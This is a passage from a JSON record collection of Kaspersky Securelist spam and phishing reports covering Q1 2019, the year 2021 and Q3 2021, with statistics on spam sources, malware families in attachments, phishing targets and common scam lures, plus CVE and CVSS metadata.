the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. **12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T15:27:23", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08143053/sl-spam-phishing-mail-abstract-990x400.jpg)\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01-727x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02-1024x402.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events "streamed" on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04-941x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05-1024x364.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06-1024x876.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details. That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07-733x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08-1024x437.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09-1024x373.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10-1024x506.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11-1024x459.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12-1024x170.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result". Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13-1024x686.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt" were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15-1024x136.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16-1024x770.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17-749x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18-1024x453.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19-1024x455.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nLike in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who've also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2,36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor called [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in the ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%) whose share was just 0.01 p.p higher than Germany's. They're followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world have faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in forth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nMost of the phishing websites blocked in 2021 used a .com domain name like in 2020, whose share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We have observed a spike in phishing activity on WhatsApp in July, when the Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. We also observed another brief surge in phishing activity on the week from October 31 through to November 6, 2021.\n\n[![Dynamics of phishing activity on WhatsApp in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[![Dynamics of phishing activity on Telegram in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[![Dynamics of phishing activity on Viber in 2021 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes \u2014 remaining two of the year's main themes \u2014 were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year. Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/22213750/securelist_spam_1-990x400.jpg)\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01-1024x711.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV 